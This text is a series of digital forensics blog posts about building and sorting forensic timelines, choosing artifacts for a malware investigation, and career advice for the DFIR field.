The picture highlights the new data added to the timeline with the Sleuthkit. The timeline now highlights the malware’s persistence mechanisms (run and services registry keys)

Timeline Data with Registry Keys' Last Write Times

Sorting the Timeline

When new data is added to a timeline it’s placed at the end of the file which means the timeline needs to be sorted prior to viewing it. There are different sorting options such as the mactime.exe program in the Sleuthkit to bodyfile format timelines. A quick method I use is my spreadsheet program’s sort feature. The settings below will make Excel sort from the oldest time to the most recent.

Excel 2007 Sort Feature

Summary

The approach described in my Building Timeline series is just one way out of many to create timelines. The DFIR community has provided a wealth of information on the topic. Look at the following examples which are only a drop in the bucket of knowledge. Harlan Carvey created and released tools for creating timelines in addition to regularly posting on his blog (a few posts are HowTo: Creating Mini-Timelines and A Bit More About Timelines...). Kristinn Gudjonsson is very similar in that he created and released log2timeline in addition to providing information on his websites (a few posts are Timeline Analysis 101 and Timeline Analysis 201 – review the timeline). Rob Lee has shared his approach in the way he builds timelines and two of his posts are SUPER Timeline Analysis and Creation and Shadow Timelines And Other VolumeShadowCopy Digital Forensics Techniques with the Sleuthkit. Chris Pogue has shared his method to create timelines on his blog and a few posts are Log2Timeline and Super Timelines and Time Stomping is for Suckers. The last author I’ll directly mention is Don Weber who released his scripts for creating timelines and blogged about creating timelines (one post is Hydraq Details Revealed Via Timeline Analysis). These are only a few tools, blog posts, and authors who have taken the time to share their thoughts on timeline analysis. To see more try the keyword “timeline” in the Digital Forensic Search to see what’s out there.

For anyone looking to become more proficient at the timeline analysis then I recommend to do what I did. Read everything you can find on the topic, download and test the different tools people talk about, and try out different approaches to see how the resulting timelines differ. It won’t only teach you about timeline analysis but will help identify what method and tools work best for you.

Building Timelines – Thought Process Behind It

Saturday, September 17, 2011 Posted by Corey Harrell 0 comments
Timelines are a valuable technique to have at your disposal when processing a case. They can reveal activity on a system that may not be readily apparent or show the lack of certain activity helping rule theories out. Timelines can be used on case ranging from human resource policy violations to financial investigations to malware infections to even auditing. Before the technique can be used one must first know how to build them.

This is the first post in my two part series on building timelines. Part 1 discusses the thought process behind building timelines while Part 2 demonstrates different tools and methods to build them.

Things to Consider

There are two well known approaches to building timelines. On the one hand is the minimalist approach; only include the exact data needed. On the other hand is the kitchen sink approach; include all data that is available. My approach falls somewhere in the middle. I put the data I definitely need into timelines and some data I think I may need. The things I take into consideration when selecting data is:

        - Examination’s Purpose
        - Identify Data Needed
        - Understand Tools’ Capabilities
        - Tailor Data List to System

Examination’s Purpose

The first thing I consider when building timelines is what is the examination’s purpose. Every case should have a specific purpose or purposes the DF analyst needs to accomplish. For example, did an employee violate an acceptable usage policy, how was a system infected, how long was a web server compromised, or locate all Word documents on a hard drive?

Identify Data Needed

The next area to consider is what data is needed to accomplish the purpose(s). This is where I make a judgment about the artifacts I think will contain relevant information and the artifacts that could contain information of interest. A few potential data sources and their artifacts are:

        - Hard drives: file system, web browsing history, registry hives, Windows short cut files, firewall logs, restore points, volume shadow copies, prefetch files, email files, or Office documents

        - Memory: network connections, processes, loaded dlls, or loaded drivers

        - Network shares: email files (including archives), office documents, or PDFs

        - Network logs: firewall logs, IDS logs, proxy server logs, web server logs, print/file server logs, or authentication server logs

I take into account the case type and examination's purpose(s) when picking the artifacts I want. To illustrate the affect case type has on my choice I'll use a malware infected system and Internet usage policy violation as examples. The malware infected system would definitely be interested in the artifacts showing program execution, firewall logs, antivirus logs, and file system metadata. The additional items I'd throw into a timeline would be the user's web browsing history, removable media usage, and registry keys last write times since those artifacts might show information about the initial infection vector and persistence mechanism. For an Internet usage policy violation I'd only include the file system metadata and web browsing history since my initial interest is limited to the person’s web browsing activities.

The examination purpose(s) will point to other artifacts of interest. Let's say if the Internet usage policy violation's purpose was to determine if an employee was surfing pornographic websites and if they were saving pornographic images to the company issued thumb drive. In addition to file system metadata and web history, I’d now want to include artifacts showing recent user activity such as Windows shortcut files or the userassist registry key.

I try to find a balance between the data I know I'll need and the data that may contain relevant information. I don't want to put everything into the timeline (kitchen sink approach) but I'm trying to avoid frequently adding more data to the timeline (minimalist approach). Finding a balance between the two lets me create one main timeline with the ability to create mini timelines using spreadsheet filters. Making the call about what data to select is not going to be perfect initially. Some data may not contain any information related to the examination while other left out data is going to be important. The important thing to remember is building timelines is a process. Data can be added or removed at later times which means thinking about data to incorporate into a timeline should occur continuously. This is especially true as more things are learned while processing the case.

Understand Tools’ Capabilities

After the examination’s purpose(s) are understood and the potential data required to accomplish it is identified then the next consideration is understanding my tools’ capabilities. Timeline tools provide different support for the artifacts they can parse. I review the items I want to put into my timeline against the artifacts supported by my tools to identify what in my list I can’t parse. If any items are not supported then I decide if the item is really needed and is there a different tool that will work. Another benefit to making this comparison is that helps to identify artifacts I might not have thought about. The picture below shows some artifacts supported by the tools I’ll discuss in the post Building Timelines – Tools Usage.


Some may be wondering why I don’t think about the tools’ capability before I consider the data I need to accomplish the examination’s purpose(s). My reason is because I don’t want to restrict myself to the capability provided by my tools. For example, none of my commercial tools are able to create the timelines I’m talking about. If I based my decision on how to accomplish what I need to do solely on my commercial tools then timelines wouldn’t even be an option. I’d rather first identify the data I want to examine then determine if my tools can parse it. This helps me see the shortcomings in my tools and lets me find other tools to get the job done.

Tailor Data List to System

At this point in the thought process potential data has been identified to put into a timeline. A timeline could be built now even though the artifact list is pretty broad. My preference is to tailor the list to the system under examination. To see what I mean I’ll discuss a common occurrence I encounter when building timelines which is including a user account’s web browser history. Based on my tools supported artifacts, the web browsing artifacts could be from: Google Chrome, Firefox 2, Firefox 3, Internet Explorer, Opera, or Safari. Is it really necessary to have my tools search for all these artifacts? If the system only has Internet Explorer (IE) installed then why spend time looking for the other items. If the same system has 12 loaded user profiles but the examination is only looking at one user account then why parse the IE history for all 12 user profiles? To minimize the time building timelines and reduce the amount of data in them the artifact list needs to be tailored to the system. A few examination checks will be enough narrow down the list. The exact checks will vary by case but one step that holds across all cases is obtaining information about the operating system (OS) and its configuration.

I previously discussed this examination step in the post Obtaining Information about the Operating System and it covers the three different information categories impacting the artifact list. The first category is the General Operating System Information and it shows the operating system version. The version will dictate whether certain artifacts are actually in the system since some are OS specific. The second category is the User Account Information which shows the user accounts (local accounts as well as accounts that logged on) associated with the system. When building a timeline it’s important to narrow the focus for the user accounts under examination; this is even more so on computers shared by multiple people. Identifying the user accounts can be done by confirming the account assigned to person, looking at the user account names, or looking at when the user accounts were last used. The third and final category is the Software Information. The category shows information about programs installed and executed on the system. The software on a system will dictate what artifacts are present. Quickly review the artifacts supported by my tools (picture above) to see how many are associated with specific applications. This one examination step can take a broad list and make it more focused to the environment where the artifacts are coming from.

Select Data for the Timeline

I reflect on the things I considered when coming up with a plan on how to build the timeline The examination's purpose outlined what I need to accomplish, potential data I want to examine was identified, my tool's capabilities were reviewed to see what artifacts can be parsed, and then checks were made to tailor the artifact list to the system I’m looking at. The list I’m left with afterwards is what gets incorporated into my first timeline. Working my way through this thought process reduces the amount of artifacts going into a timeline; thus reducing the amount of data I’ll need to weed through.

Thought Process Example

The thought process I described may appear to be pretty extensive but that is really not the case. The length is because I wanted to do a good job explaining it since I feel it’s important. The process only takes a little time to complete and most of it is already done when processing a case. Follow along a DF analyst on a hypothetic case to see how the thought process works in coming up with a plan to build the timeline. Please note, the case only mentions a few artifacts to get my point across but an actual case may use more.

Friend: “Damm … Some program keeps saying I’m infected and won’t go away. Let me call the DF analyst since he does something with computers for a living. He can fix it

Phone rings and DF analyst picks up

Friend: “DF analyst … Some program keeps saying I’m infected with viruses and blocks me from doing anything.”

DF analyst: “Do you have any security programs installed such as antivirus software, and if so is that what you’re seeing

Friend: “I think I have Norton installed but I’ve never seen this program before. Wait … hold on … Oh man, now pornographic sites are popping up on my screen

DF analyst: “Yup, sounds like you’re infected

Friend: “I know I’m infected. That’s what I told you this program has been telling me

DF analyst: “Umm .. The program saying you are infected is actually the virus.”

Friend: “Hmmmm….”

DF analyst: “Just power down the computer and I’ll take a look at later today.

Computer powering down

DF analyst: “When did you start noticing the program?

Friend: “Today when I was using the computer.

DF analyst: “What were you doing?

Friend: “Stuff… Surfing the web, checking email, and working on some documents. I really need my computer. Can you just get rid of the virus and let me know if my wife or kids did this to my computer?

Later that day

DF analyst has the system back in the lab. He thinks about what he needs to do which is to remove the malware from the system and determine how it got there. The potential data list he came up with to accomplish those tasks was: known malware files, system’s autostart locations, programs executed (prefetch, userassist, and muicache), file system metadata, registry hives, event logs, web browser history, AV logs, and restore points/volume shadow copies.

Wanting to know what launches when his friend logs onto the computer the DF analyst uses the Sysinternals autorun utility in offline mode to find out. Sitting in one run key was an executable with a folder path to his friend’s user profile. A Google search using the file’s MD5 hash confirmed the file was malicious and his friend’s system was infected. DF analyst decided to leverage a timeline to see what else was dropped onto the system and what caused it to get dropped in the first place.

DF analyst pulls out his reference showing the various artifacts supported by his timeline tools. He confirms that all the potential data he identified is supported. Then he moves on to his first examination step which is examining the hard drive’s layout. Two partitions, one is the Dell recovery formatted with Fat32 while the other is for the operating system formatted with NTFS. DF analysts just added NTFS artifacts ($MFT) to his potential data list. To get a better idea about the system he uses Regripper to rip out the general operating system information. Things he learned from the Regripper reports and the decisions he made based on the information:

         - OS version is XP (restore points are in play while shadow copies are out. Need to parse event logs with evt file extensions)

        - Three user accounts were used in the past week (initial focus for certain artifacts will be from friend’s user account since malware was located there. The two other user accounts may be analyzed depending on what the file system metadata shows)

        - Internet Explorer was only web browser installed (all other web browser artifacts won’t be parsed at this time)

        - Kaspersky antivirus software was installed (tools don’t support this log format. AV log will be reviewed and entries will be put into the timeline manually)

DF analyst performs a few other checks. Prefetch folder has files in it and his friend’s user account recycle bin has numerous files in it. Both were added to the timeline artifact list. The final list contains items from the system and one user account. The system data has: prefetch files, event logs (evt), system restore points, Master file Table. The artifacts from one user account are: userassist registry key, muicache registry key, IE history, and the Recycle bin contents. DF analyst is ready to build his timeline …. Stay tuned for the post "Building Timelines – Tools Usage" to see one possbile way to do it.


I'd like to hear feedback about how other's approach building timelines; especially if it's different than what I wrote. It's helpful to see how other analysts are building timelines.
Labels:

Linkz 4 Advice

Monday, September 12, 2011 Posted by Corey Harrell 2 comments
There won’t be any links pointing to Dr. Phil, Dear Abby, or Aunt Cleo. Not that there’s anything wrong that… They just don’t provide advice on a career in DFIR.

Getting Started in DFIR

Harlan put together the post Getting Started which contains great advice for people looking to get into DF. I think his advice even applies to folks already working in the field. DF is huge with a lot of areas for specialization. Harlan’s first tip was to pick something and start there. How true is that advice for us since we aren’t Abby from NCIS (a forensic expert in everything)? People have their expertise: Windows, Macs, cell phones, Linux, etc. but there is always room to expand our knowledge and skills. The best way to expand into other DF areas is to “pick something and start there”.

Another tip is to have a passion for the work we do. In Harlan’s words “in this industry, you can't sit back and wait for stuff to come to you...you have to go after it”. I completely agree with this statement and DF is not the field to get complacent in. There needs to be a drive deep down inside to continuously want to improve your knowledge and skills. For example, it would be easy to be complacent to maintain knowledge only about the Windows XP operating system if it’s the technology normally faced. However, it would be ignoring the fact that at some point in the near future encounters with Windows 7 boxes and non-Windows system will be the norm. A passion for DF is needed to push yourself so you can learn and improve your skills on your own without someone (i.e. an employer) telling you what you should be doing.

I wanted to touch on those two tips but the entire post is well worth the read, regardless if you are looking to get into DF or already arrived.

Speaking about a Passion

Little Mac over at the Forensicaliente blog shared his thoughts about needing a drive to succeed in DF. I’m not musically inclined but he uses a good analogy to explain what it takes to be successful. Check out his post Is Scottish Fiddle like Digital Forensics?.

Breaking into the Field

Lenny Zelster discussed How to Get Into Digital Forensics or Security Incident Response on his blog last month. One issue facing people looking to break into the field is that organizations may not be willing to spend the time and resources to train a person new to the field. Lenny suggested people should leverage their current positions to acquire relevant DFIR skills.

Lenny’s advice doesn’t apply to how I broke into the field since DFIR was basically dropped into my lab when I was tasked with developing the DF capability for my organization. However, his advice is spot on for how I was able to land my first position in the information security field (which is what lead me into DFIR). I was first exposed to security during my undergraduate studies when I took a few courses on the topic. It was intriguing but the reality was there weren’t a lot of security jobs in my area which meant my destination was still IT operations. I continued down the track pushing me further into IT but I always kept my desire for security work in mind. After graduation I took a position in an IT shop where I had a range of responsibilities including networking and server administration. In this role, I wanted to learn how to secure the technology I was responsible for managing and what techniques to use to test security controls. This is due diligence as being a system admin but it also allowed me to get knowledge and some skills in the security field. In addition to operational security, I even tried to push an initiative to develop and establish an information security policy. Unfortunately, the initiative failed and it was my first lesson in nothing will be successful without management’s support. All was not lost because the experience and my research taught me a lot about security being a process that supports the business. This is a key concept about security and up until that point my focus was on security's technical aspects.

I leveraged the position I was in to acquire knowledge and skills about my chosen field (security). My actions weren’t completely self serving since my employer benefited from having someone to help secure their network. I didn’t realize how valuable it was to expand my knowledge and skills until my first security job interview. Going in I thought I lacked the skills and knowledge but over the course of the interview I realized I had a lot more to offer. I took the initiative to expand my skillset and it was an important factor in helping me land in the security field. My experience is very similar to the Lenny’s advice except his post is about getting into the DFIR field.

Get a plan before going into the weeds

Rounding out the links providing sound guidance, Bill over at the Unchained Forensics blog gave some good advice in his recent post Explosions Explosions. He shared his thoughts on how he approaches examinations. One comment he made that I wanted to highlight was “more and more of my most efficient time is being used at the case planning stage”. He mentions how he thinks about his plan to tackle the case, including identifying potential data of interest, before he even starts his examination. I think it’s a great point to keep reinforcing for people new and old to DFIR.

I remember when I was new to the field. I had a newly established process and skillset but I lacked certain wisdom in how to approach cases. As expected, I went above and beyond in examining my first few cases. I even thought I was able to do some “cool stuff” the person requesting DF assistance would be interested in. There was one small issue I overlooked. The person was only interested in specific data’s content while I went beyond that, way beyond that. I wasted time and the cool stuff I thought I did was never even used. I learned two things from the experience. First was to make sure I understand what I’m being asked to do; even if it means asking follow-up questions or educating the requestor about DF. The second lesson was to think about what I’m going to do before I do it. What data do I need? What steps in my procedures should I complete? What procedural steps can be omitted? What’s my measure for success telling me when the examination is complete? Taking the time beforehand to gather your thoughts and develop a plan helps to keep the examination focused on the customer’s needs while limiting the “cool stuff” that’s not even needed.

Books On demand

If someone were to ask me what is the best training I have every taken I know exactly what I would say. A book, computer, Google, and time. That’s it and the cost is pretty minimal since only a book needs to be purchased. I’m not knocking training courses but classes cannot compare to educating yourself through reading, researching, and testing. I never heard about Books24x7 until I started working for my current employer. Books24x7 is virtual library providing access to “in-class books, book summaries, research reports and best practices”. The books in my subscription include topics on: security, DFIR, certification, business, programming, operating systems, networking, and databases. I can find the information I’m looking for by searching numerous books whether I’m researching, testing, or working. A quick search for DFIR books located: Malware Forensics: Investigating and Analyzing Malicious Code, Windows Registry Forensics: Advanced Digital Forensic Analysis of the Windows Registry, Windows Forensic Analysis Toolkit Second Edition, Malware Analyst's Cookbook: Tools and Techniques for Fighting Malicious Code, EnCase Computer Forensics: The Official EnCE: EnCase Certified Examiner Study Guide, and UNIX and Linux Forensic Analysis Toolkit. That’s only a few books from the pages and pages of search results for DFIR. Talk about a wealth of information at your fingertips.

The cost may be a little steep for an individual but it might be more reasonable for an organization. If an organization’s employees have a passion for their work and take the initiative to acquire new skills then Books24x7 could be an option as a training expense. Plus, it could save money from not having to purchase technical books for staff. Please note, I don’t benefit in any way by mentioning this service on my blog. I wanted to share the site since it’s been a valuable resource when I’m doing my job or self training to learn more about DFIR and security.
Labels: ,